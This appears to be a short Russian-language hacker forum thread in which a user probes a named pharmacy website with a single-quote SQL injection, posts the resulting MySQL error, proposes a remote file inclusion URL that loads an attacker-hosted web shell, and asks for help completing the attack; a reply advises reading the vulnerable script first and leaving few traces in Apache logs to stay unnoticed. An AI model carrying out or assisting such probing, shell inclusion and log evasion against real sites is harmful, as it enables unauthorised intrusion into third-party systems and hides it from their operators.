Нашел этот сайт смотри тута (http://goldpharma.com/) потом сделал вот http://наш сайт.com/?show=item&item=%D1%8D&cur=' и видим

Query Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

видать,дело пахнет керосином...а вот если сделать http://этот сайт.com/?load=http://ваш шелл то вообще весело

помогите довести sql до конца

Обычная ошибка. Не уязвимость

если есть возможность заинклудить шелл, то зачем мудохатся с инъекцией?
А если так уж охота провести инъекцию, то я в твоем случае для начала сливаю сам скрипт в котором потенциальная бага, ищу есть ли там ошибка, и только потом организовую атаку. На апаче ведь логи ведутся, и чем меньше наследишь тем больше вероятность остаться незамеченным.

ЗЫ. Кстати даже если ты можешь влиять на запрос, то не всегда есть возможность напакостить. Порой стоят оч неплохе фильтры.

ну как вам сказать-шелл не коннектится...нинай пачму